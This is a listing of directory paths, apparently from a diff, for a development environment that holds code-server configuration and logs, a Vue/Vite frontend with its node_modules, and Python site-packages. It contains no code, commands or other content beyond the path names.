+./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatEditingSessions/4f44a27a-de0a-4e31-904f-212ba1423280/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/3d7c237e/chatSessions +./.vscode_config/.local/share/code-server/User/workspaceStorage/-53e2bffc +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/d9f9e18e-5e68-4fad-8ff9-f520bbdccd72 +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/d9f9e18e-5e68-4fad-8ff9-f520bbdccd72/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/810c61e8-420b-4c2d-b90d-78405f575e10 +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/810c61e8-420b-4c2d-b90d-78405f575e10/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5127fd56-e03a-4cc6-8376-e74d4e23ce7c +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5127fd56-e03a-4cc6-8376-e74d4e23ce7c/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5cf441f2-ab0c-446e-a7ad-87e3c3bfea3c +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/5cf441f2-ab0c-446e-a7ad-87e3c3bfea3c/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/1c1e6083-b4f9-42e4-ae28-2f71caba0cf4 +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/1c1e6083-b4f9-42e4-ae28-2f71caba0cf4/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/afa463b1-e6ec-42f8-8aca-aa89ccce4936 +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatEditingSessions/afa463b1-e6ec-42f8-8aca-aa89ccce4936/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/70d739db/chatSessions +./.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359 +./.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatEditingSessions +./.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatEditingSessions/d4cc21e9-36f6-444d-b20c-4c91876bba2b +./.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatEditingSessions/d4cc21e9-36f6-444d-b20c-4c91876bba2b/contents +./.vscode_config/.local/share/code-server/User/workspaceStorage/-ad48359/chatSessions +./.vscode_config/.local/share/code-server/extensions +./.vscode_config/.local/share/code-server/CachedProfilesData +./.vscode_config/.local/share/code-server/CachedProfilesData/__default__profile__ +./.vscode_config/.local/share/code-server/logs +./.vscode_config/.local/share/code-server/logs/20260126T174543 +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5 +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.git +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost5/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3 +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.git +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost3/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7 +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.git +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost7/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6 +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.git +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost6/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1 +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.git +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost1/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4 +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.git +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost4/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2 +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.git +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost2/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8 +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.git +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github +./.vscode_config/.local/share/code-server/logs/20260126T174543/exthost8/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260126T164451 +./.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1 +./.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.git +./.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github +./.vscode_config/.local/share/code-server/logs/20260126T164451/exthost1/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260129T214520 +./.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1 +./.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.css-language-features +./.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.typescript-language-features +./.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.git +./.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github +./.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.html-language-features +./.vscode_config/.local/share/code-server/logs/20260129T214520/exthost1/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260129T001948 +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3 +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.git +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost3/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1 +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.git +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost1/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2 +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.git +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.html-language-features +./.vscode_config/.local/share/code-server/logs/20260129T001948/exthost2/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260129T213246 +./.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1 +./.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.git +./.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github +./.vscode_config/.local/share/code-server/logs/20260129T213246/exthost1/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost5/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost10/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost3/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost9/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost7/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost6/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost1/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost4/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost2/vscode.github-authentication +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8 +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.git +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github +./.vscode_config/.local/share/code-server/logs/20260125T233505/exthost8/vscode.github-authentication +./.vscode_config/.local/share/mc +./.vscode_config/.ssh +./.vscode_config/.config +./.vscode_config/.config/code-server +./.vscode_config/.config/mc +./.vscode_config/.cache +./.vscode_config/.cache/typescript +./.vscode_config/.cache/typescript/5.9 +./.vscode_config/.cache/Microsoft +./.vscode_config/.cache/Microsoft/DeveloperTools +./.vscode_config/.cache/mc +./logs +./frontend +./frontend/src +./frontend/src/views +./frontend/src/views/admin +./frontend/src/assets +./frontend/src/router +./frontend/src/stores +./frontend/src/services +./frontend/src/components +./frontend/public +./frontend/node_modules +./frontend/node_modules/detect-libc +./frontend/node_modules/detect-libc/lib +./frontend/node_modules/jsesc +./frontend/node_modules/jsesc/man +./frontend/node_modules/jsesc/bin +./frontend/node_modules/unplugin-utils +./frontend/node_modules/unplugin-utils/dist +./frontend/node_modules/asynckit +./frontend/node_modules/asynckit/lib +./frontend/node_modules/@types +./frontend/node_modules/@types/estree +./frontend/node_modules/estree-walker +./frontend/node_modules/estree-walker/src +./frontend/node_modules/estree-walker/types +./frontend/node_modules/estree-walker/dist +./frontend/node_modules/estree-walker/dist/umd +./frontend/node_modules/estree-walker/dist/esm +./frontend/node_modules/local-pkg +./frontend/node_modules/local-pkg/dist +./frontend/node_modules/copy-anything +./frontend/node_modules/copy-anything/dist +./frontend/node_modules/postcss +./frontend/node_modules/postcss/lib +./frontend/node_modules/speakingurl +./frontend/node_modules/speakingurl/examples +./frontend/node_modules/speakingurl/test +./frontend/node_modules/speakingurl/lib +./frontend/node_modules/speakingurl/typings +./frontend/node_modules/speakingurl/typings/speakingurl +./frontend/node_modules/fraction.js +./frontend/node_modules/fraction.js/src +./frontend/node_modules/fraction.js/examples +./frontend/node_modules/fraction.js/dist +./frontend/node_modules/fraction.js/tests +./frontend/node_modules/ast-kit +./frontend/node_modules/ast-kit/dist +./frontend/node_modules/get-proto +./frontend/node_modules/get-proto/test +./frontend/node_modules/get-proto/.github +./frontend/node_modules/.bin +./frontend/node_modules/es-object-atoms +./frontend/node_modules/es-object-atoms/test +./frontend/node_modules/es-object-atoms/.github +./frontend/node_modules/pathe +./frontend/node_modules/pathe/dist +./frontend/node_modules/pathe/dist/shared +./frontend/node_modules/source-map-js +./frontend/node_modules/source-map-js/lib +./frontend/node_modules/@esbuild +./frontend/node_modules/@esbuild/linux-x64 +./frontend/node_modules/@esbuild/linux-x64/bin +./frontend/node_modules/@rolldown +./frontend/node_modules/@rolldown/pluginutils +./frontend/node_modules/@rolldown/pluginutils/dist +./frontend/node_modules/vue +./frontend/node_modules/vue/compiler-sfc +./frontend/node_modules/vue/dist +./frontend/node_modules/vue/server-renderer +./frontend/node_modules/vue/jsx-runtime +./frontend/node_modules/delayed-stream +./frontend/node_modules/delayed-stream/lib +./frontend/node_modules/lightningcss-linux-x64-gnu +./frontend/node_modules/magic-string +./frontend/node_modules/magic-string/dist +./frontend/node_modules/es-define-property +./frontend/node_modules/es-define-property/test +./frontend/node_modules/es-define-property/.github +./frontend/node_modules/chart.js +./frontend/node_modules/chart.js/dist +./frontend/node_modules/chart.js/dist/plugins +./frontend/node_modules/chart.js/dist/plugins/plugin.filler +./frontend/node_modules/chart.js/dist/core +./frontend/node_modules/chart.js/dist/platform +./frontend/node_modules/chart.js/dist/types +./frontend/node_modules/chart.js/dist/controllers +./frontend/node_modules/chart.js/dist/helpers +./frontend/node_modules/chart.js/dist/elements +./frontend/node_modules/chart.js/dist/chunks +./frontend/node_modules/chart.js/dist/scales +./frontend/node_modules/chart.js/helpers +./frontend/node_modules/chart.js/auto +./frontend/node_modules/lightningcss +./frontend/node_modules/lightningcss/node +./frontend/node_modules/form-data +./frontend/node_modules/form-data/lib +./frontend/node_modules/graceful-fs +./frontend/node_modules/node-releases +./frontend/node_modules/node-releases/data +./frontend/node_modules/node-releases/data/processed +./frontend/node_modules/node-releases/data/release-schedule +./frontend/node_modules/@babel +./frontend/node_modules/@babel/helper-string-parser +./frontend/node_modules/@babel/helper-string-parser/lib +./frontend/node_modules/@babel/generator +./frontend/node_modules/@babel/generator/lib +./frontend/node_modules/@babel/generator/lib/node +./frontend/node_modules/@babel/generator/lib/generators +./frontend/node_modules/@babel/types +./frontend/node_modules/@babel/types/lib +./frontend/node_modules/@babel/types/lib/retrievers +./frontend/node_modules/@babel/types/lib/clone +./frontend/node_modules/@babel/types/lib/comments +./frontend/node_modules/@babel/types/lib/utils +./frontend/node_modules/@babel/types/lib/utils/react +./frontend/node_modules/@babel/types/lib/converters +./frontend/node_modules/@babel/types/lib/traverse +./frontend/node_modules/@babel/types/lib/asserts +./frontend/node_modules/@babel/types/lib/asserts/generated +./frontend/node_modules/@babel/types/lib/modifications +./frontend/node_modules/@babel/types/lib/modifications/typescript +./frontend/node_modules/@babel/types/lib/modifications/flow +./frontend/node_modules/@babel/types/lib/constants +./frontend/node_modules/@babel/types/lib/constants/generated +./frontend/node_modules/@babel/types/lib/builders +./frontend/node_modules/@babel/types/lib/builders/typescript +./frontend/node_modules/@babel/types/lib/builders/react +./frontend/node_modules/@babel/types/lib/builders/flow +./frontend/node_modules/@babel/types/lib/builders/generated +./frontend/node_modules/@babel/types/lib/definitions +./frontend/node_modules/@babel/types/lib/ast-types +./frontend/node_modules/@babel/types/lib/ast-types/generated +./frontend/node_modules/@babel/types/lib/validators +./frontend/node_modules/@babel/types/lib/validators/react +./frontend/node_modules/@babel/types/lib/validators/generated +./frontend/node_modules/@babel/parser +./frontend/node_modules/@babel/parser/lib +./frontend/node_modules/@babel/parser/bin +./frontend/node_modules/@babel/parser/typings +./frontend/node_modules/@babel/helper-validator-identifier +./frontend/node_modules/@babel/helper-validator-identifier/lib +./frontend/node_modules/electron-to-chromium +./frontend/node_modules/webpack-virtual-modules +./frontend/node_modules/webpack-virtual-modules/src +./frontend/node_modules/webpack-virtual-modules/lib +./frontend/node_modules/mime-types +./frontend/node_modules/has-tostringtag +./frontend/node_modules/has-tostringtag/test +./frontend/node_modules/has-tostringtag/test/shams +./frontend/node_modules/has-tostringtag/.github +./frontend/node_modules/picocolors +./frontend/node_modules/browserslist +./frontend/node_modules/unplugin +./frontend/node_modules/unplugin/dist +./frontend/node_modules/unplugin/dist/webpack +./frontend/node_modules/unplugin/dist/webpack/loaders +./frontend/node_modules/unplugin/dist/rspack +./frontend/node_modules/unplugin/dist/rspack/loaders +./frontend/node_modules/hasown +./frontend/node_modules/hasown/.github +./frontend/node_modules/autoprefixer +./frontend/node_modules/autoprefixer/lib +./frontend/node_modules/autoprefixer/lib/hacks +./frontend/node_modules/autoprefixer/bin +./frontend/node_modules/autoprefixer/data +./frontend/node_modules/acorn +./frontend/node_modules/acorn/dist +./frontend/node_modules/acorn/bin +./frontend/node_modules/magic-string-ast +./frontend/node_modules/magic-string-ast/dist +./frontend/node_modules/es-errors +./frontend/node_modules/es-errors/test +./frontend/node_modules/es-errors/.github +./frontend/node_modules/jiti +./frontend/node_modules/jiti/lib +./frontend/node_modules/jiti/dist +./frontend/node_modules/mime-db +./frontend/node_modules/combined-stream +./frontend/node_modules/combined-stream/lib +./frontend/node_modules/@alloc +./frontend/node_modules/@alloc/quick-lru +./frontend/node_modules/@tailwindcss +./frontend/node_modules/@tailwindcss/postcss +./frontend/node_modules/@tailwindcss/postcss/dist +./frontend/node_modules/@tailwindcss/node +./frontend/node_modules/@tailwindcss/node/dist +./frontend/node_modules/@tailwindcss/oxide-linux-x64-gnu +./frontend/node_modules/@tailwindcss/oxide +./frontend/node_modules/escalade +./frontend/node_modules/escalade/dist +./frontend/node_modules/escalade/sync +./frontend/node_modules/function-bind +./frontend/node_modules/function-bind/test +./frontend/node_modules/function-bind/.github +./frontend/node_modules/tinyglobby +./frontend/node_modules/tinyglobby/dist +./frontend/node_modules/confbox +./frontend/node_modules/confbox/dist +./frontend/node_modules/confbox/dist/shared +./frontend/node_modules/@rollup +./frontend/node_modules/@rollup/rollup-linux-x64-musl +./frontend/node_modules/@rollup/rollup-linux-x64-gnu +./frontend/node_modules/pkg-types +./frontend/node_modules/pkg-types/dist +./frontend/node_modules/pinia +./frontend/node_modules/pinia/dist +./frontend/node_modules/enhanced-resolve +./frontend/node_modules/enhanced-resolve/lib +./frontend/node_modules/enhanced-resolve/lib/util +./frontend/node_modules/postcss-value-parser +./frontend/node_modules/postcss-value-parser/lib +./frontend/node_modules/birpc +./frontend/node_modules/birpc/dist +./frontend/node_modules/@vue +./frontend/node_modules/@vue/shared +./frontend/node_modules/@vue/shared/dist +./frontend/node_modules/@vue/devtools-kit +./frontend/node_modules/@vue/devtools-kit/dist +./frontend/node_modules/@vue/runtime-dom +./frontend/node_modules/@vue/runtime-dom/dist +./frontend/node_modules/@vue/compiler-sfc +./frontend/node_modules/@vue/compiler-sfc/dist +./frontend/node_modules/@vue/devtools-shared +./frontend/node_modules/@vue/devtools-shared/dist +./frontend/node_modules/@vue/compiler-core +./frontend/node_modules/@vue/compiler-core/dist +./frontend/node_modules/@vue/compiler-ssr +./frontend/node_modules/@vue/compiler-ssr/dist +./frontend/node_modules/@vue/compiler-dom +./frontend/node_modules/@vue/compiler-dom/dist +./frontend/node_modules/@vue/devtools-api +./frontend/node_modules/@vue/devtools-api/dist +./frontend/node_modules/@vue/server-renderer +./frontend/node_modules/@vue/server-renderer/dist +./frontend/node_modules/@vue/reactivity +./frontend/node_modules/@vue/reactivity/dist +./frontend/node_modules/@vue/runtime-core +./frontend/node_modules/@vue/runtime-core/dist +./frontend/node_modules/.vite +./frontend/node_modules/.vite/deps +./frontend/node_modules/tapable +./frontend/node_modules/tapable/lib +./frontend/node_modules/call-bind-apply-helpers +./frontend/node_modules/call-bind-apply-helpers/test +./frontend/node_modules/call-bind-apply-helpers/.github +./frontend/node_modules/follow-redirects +./frontend/node_modules/caniuse-lite +./frontend/node_modules/caniuse-lite/dist +./frontend/node_modules/caniuse-lite/dist/lib +./frontend/node_modules/caniuse-lite/dist/unpacker +./frontend/node_modules/caniuse-lite/data +./frontend/node_modules/caniuse-lite/data/regions +./frontend/node_modules/caniuse-lite/data/features +./frontend/node_modules/@vitejs +./frontend/node_modules/@vitejs/plugin-vue +./frontend/node_modules/@vitejs/plugin-vue/dist +./frontend/node_modules/baseline-browser-mapping +./frontend/node_modules/baseline-browser-mapping/dist +./frontend/node_modules/@jridgewell +./frontend/node_modules/@jridgewell/remapping +./frontend/node_modules/@jridgewell/remapping/src +./frontend/node_modules/@jridgewell/remapping/types +./frontend/node_modules/@jridgewell/remapping/dist +./frontend/node_modules/@jridgewell/resolve-uri +./frontend/node_modules/@jridgewell/resolve-uri/dist +./frontend/node_modules/@jridgewell/resolve-uri/dist/types +./frontend/node_modules/@jridgewell/sourcemap-codec +./frontend/node_modules/@jridgewell/sourcemap-codec/src +./frontend/node_modules/@jridgewell/sourcemap-codec/types +./frontend/node_modules/@jridgewell/sourcemap-codec/dist +./frontend/node_modules/@jridgewell/gen-mapping +./frontend/node_modules/@jridgewell/gen-mapping/src +./frontend/node_modules/@jridgewell/gen-mapping/types +./frontend/node_modules/@jridgewell/gen-mapping/dist +./frontend/node_modules/@jridgewell/gen-mapping/dist/types +./frontend/node_modules/@jridgewell/trace-mapping +./frontend/node_modules/@jridgewell/trace-mapping/src +./frontend/node_modules/@jridgewell/trace-mapping/types +./frontend/node_modules/@jridgewell/trace-mapping/dist +./frontend/node_modules/perfect-debounce +./frontend/node_modules/perfect-debounce/dist +./frontend/node_modules/dunder-proto +./frontend/node_modules/dunder-proto/test +./frontend/node_modules/dunder-proto/.github +./frontend/node_modules/es-set-tostringtag +./frontend/node_modules/es-set-tostringtag/test +./frontend/node_modules/has-symbols +./frontend/node_modules/has-symbols/test +./frontend/node_modules/has-symbols/test/shams +./frontend/node_modules/has-symbols/.github +./frontend/node_modules/picomatch +./frontend/node_modules/picomatch/lib +./frontend/node_modules/gopd +./frontend/node_modules/gopd/test +./frontend/node_modules/gopd/.github +./frontend/node_modules/is-what +./frontend/node_modules/is-what/dist +./frontend/node_modules/tailwindcss +./frontend/node_modules/tailwindcss/dist +./frontend/node_modules/get-intrinsic +./frontend/node_modules/get-intrinsic/test +./frontend/node_modules/get-intrinsic/.github +./frontend/node_modules/json5 +./frontend/node_modules/json5/lib +./frontend/node_modules/json5/dist +./frontend/node_modules/superjson +./frontend/node_modules/superjson/dist +./frontend/node_modules/yaml +./frontend/node_modules/yaml/dist +./frontend/node_modules/yaml/dist/doc +./frontend/node_modules/yaml/dist/schema +./frontend/node_modules/yaml/dist/schema/core +./frontend/node_modules/yaml/dist/schema/common +./frontend/node_modules/yaml/dist/schema/json +./frontend/node_modules/yaml/dist/schema/yaml-1.1 +./frontend/node_modules/yaml/dist/parse +./frontend/node_modules/yaml/dist/compose +./frontend/node_modules/yaml/dist/nodes +./frontend/node_modules/yaml/dist/stringify +./frontend/node_modules/yaml/browser +./frontend/node_modules/yaml/browser/dist +./frontend/node_modules/yaml/browser/dist/doc +./frontend/node_modules/yaml/browser/dist/schema +./frontend/node_modules/yaml/browser/dist/schema/core +./frontend/node_modules/yaml/browser/dist/schema/common +./frontend/node_modules/yaml/browser/dist/schema/json +./frontend/node_modules/yaml/browser/dist/schema/yaml-1.1 +./frontend/node_modules/yaml/browser/dist/parse +./frontend/node_modules/yaml/browser/dist/compose +./frontend/node_modules/yaml/browser/dist/nodes +./frontend/node_modules/yaml/browser/dist/stringify +./frontend/node_modules/update-browserslist-db +./frontend/node_modules/@vue-macros +./frontend/node_modules/@vue-macros/common +./frontend/node_modules/@vue-macros/common/dist +./frontend/node_modules/csstype +./frontend/node_modules/muggle-string +./frontend/node_modules/muggle-string/out +./frontend/node_modules/quansync +./frontend/node_modules/quansync/dist +./frontend/node_modules/.vite-temp +./frontend/node_modules/exsolve +./frontend/node_modules/exsolve/dist +./frontend/node_modules/esbuild +./frontend/node_modules/esbuild/lib +./frontend/node_modules/esbuild/bin +./frontend/node_modules/readdirp +./frontend/node_modules/mlly +./frontend/node_modules/mlly/dist +./frontend/node_modules/mlly/node_modules +./frontend/node_modules/mlly/node_modules/confbox +./frontend/node_modules/mlly/node_modules/confbox/dist +./frontend/node_modules/mlly/node_modules/confbox/dist/shared +./frontend/node_modules/mlly/node_modules/pkg-types +./frontend/node_modules/mlly/node_modules/pkg-types/dist +./frontend/node_modules/hookable +./frontend/node_modules/hookable/dist +./frontend/node_modules/scule +./frontend/node_modules/scule/dist +./frontend/node_modules/math-intrinsics +./frontend/node_modules/math-intrinsics/test +./frontend/node_modules/math-intrinsics/.github +./frontend/node_modules/math-intrinsics/constants +./frontend/node_modules/chokidar +./frontend/node_modules/nanoid +./frontend/node_modules/nanoid/bin +./frontend/node_modules/nanoid/async +./frontend/node_modules/nanoid/url-alphabet +./frontend/node_modules/nanoid/non-secure +./frontend/node_modules/vue-chartjs +./frontend/node_modules/vue-chartjs/dist +./frontend/node_modules/rollup +./frontend/node_modules/rollup/dist +./frontend/node_modules/rollup/dist/shared +./frontend/node_modules/rollup/dist/es +./frontend/node_modules/rollup/dist/es/shared +./frontend/node_modules/rollup/dist/bin +./frontend/node_modules/proxy-from-env +./frontend/node_modules/rfdc +./frontend/node_modules/rfdc/test +./frontend/node_modules/rfdc/.github +./frontend/node_modules/rfdc/.github/workflows +./frontend/node_modules/fdir +./frontend/node_modules/fdir/dist +./frontend/node_modules/ufo +./frontend/node_modules/ufo/dist +./frontend/node_modules/entities +./frontend/node_modules/entities/src +./frontend/node_modules/entities/src/internal +./frontend/node_modules/entities/src/generated +./frontend/node_modules/entities/dist +./frontend/node_modules/entities/dist/commonjs +./frontend/node_modules/entities/dist/commonjs/internal +./frontend/node_modules/entities/dist/commonjs/generated +./frontend/node_modules/entities/dist/esm +./frontend/node_modules/entities/dist/esm/internal +./frontend/node_modules/entities/dist/esm/generated +./frontend/node_modules/@kurkle +./frontend/node_modules/@kurkle/color +./frontend/node_modules/@kurkle/color/dist +./frontend/node_modules/mitt +./frontend/node_modules/mitt/dist +./frontend/node_modules/vue-router +./frontend/node_modules/vue-router/dist +./frontend/node_modules/vue-router/dist/volar +./frontend/node_modules/vue-router/dist/unplugin +./frontend/node_modules/vue-router/dist/experimental +./frontend/node_modules/vue-router/vetur +./frontend/node_modules/vue-router/node_modules +./frontend/node_modules/vue-router/node_modules/@vue +./frontend/node_modules/vue-router/node_modules/@vue/devtools-kit +./frontend/node_modules/vue-router/node_modules/@vue/devtools-kit/dist +./frontend/node_modules/vue-router/node_modules/@vue/devtools-shared +./frontend/node_modules/vue-router/node_modules/@vue/devtools-shared/dist +./frontend/node_modules/vue-router/node_modules/@vue/devtools-api +./frontend/node_modules/vue-router/node_modules/@vue/devtools-api/dist +./frontend/node_modules/vue-router/node_modules/perfect-debounce +./frontend/node_modules/vue-router/node_modules/perfect-debounce/dist +./frontend/node_modules/axios +./frontend/node_modules/axios/lib +./frontend/node_modules/axios/lib/core +./frontend/node_modules/axios/lib/adapters +./frontend/node_modules/axios/lib/platform +./frontend/node_modules/axios/lib/platform/node +./frontend/node_modules/axios/lib/platform/node/classes +./frontend/node_modules/axios/lib/platform/common +./frontend/node_modules/axios/lib/platform/browser +./frontend/node_modules/axios/lib/platform/browser/classes +./frontend/node_modules/axios/lib/helpers +./frontend/node_modules/axios/lib/env +./frontend/node_modules/axios/lib/env/classes +./frontend/node_modules/axios/lib/defaults +./frontend/node_modules/axios/lib/cancel +./frontend/node_modules/axios/dist +./frontend/node_modules/axios/dist/node +./frontend/node_modules/axios/dist/browser +./frontend/node_modules/axios/dist/esm +./frontend/node_modules/vite +./frontend/node_modules/vite/types +./frontend/node_modules/vite/types/internal +./frontend/node_modules/vite/dist +./frontend/node_modules/vite/dist/node +./frontend/node_modules/vite/dist/node/chunks +./frontend/node_modules/vite/dist/client +./frontend/node_modules/vite/bin +./frontend/node_modules/vite/misc +./frontend/node_modules/ast-walker-scope +./frontend/node_modules/ast-walker-scope/dist +./frontend/.vscode +./code-server-config +./code-server-config/.local +./code-server-config/.local/share +./code-server-config/.local/share/nano +./code-server-config/.local/share/code-server +./code-server-config/.local/share/code-server/coder-logs +./code-server-config/.local/lib +./code-server-config/.local/lib/python3.12 +./code-server-config/.local/lib/python3.12/site-packages +./code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info +./code-server-config/.local/lib/python3.12/site-packages/beautifulsoup4-4.14.3.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/idna +./code-server-config/.local/lib/python3.12/site-packages/bs4 +./code-server-config/.local/lib/python3.12/site-packages/bs4/builder +./code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info +./code-server-config/.local/lib/python3.12/site-packages/greenlet-3.3.0.dist-info/licenses +./code-server-config/.local/lib/python3.12/site-packages/certifi +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/connectors +./code-server-config/.local/lib/python3.12/site-packages/sqlalchemy/cyextension 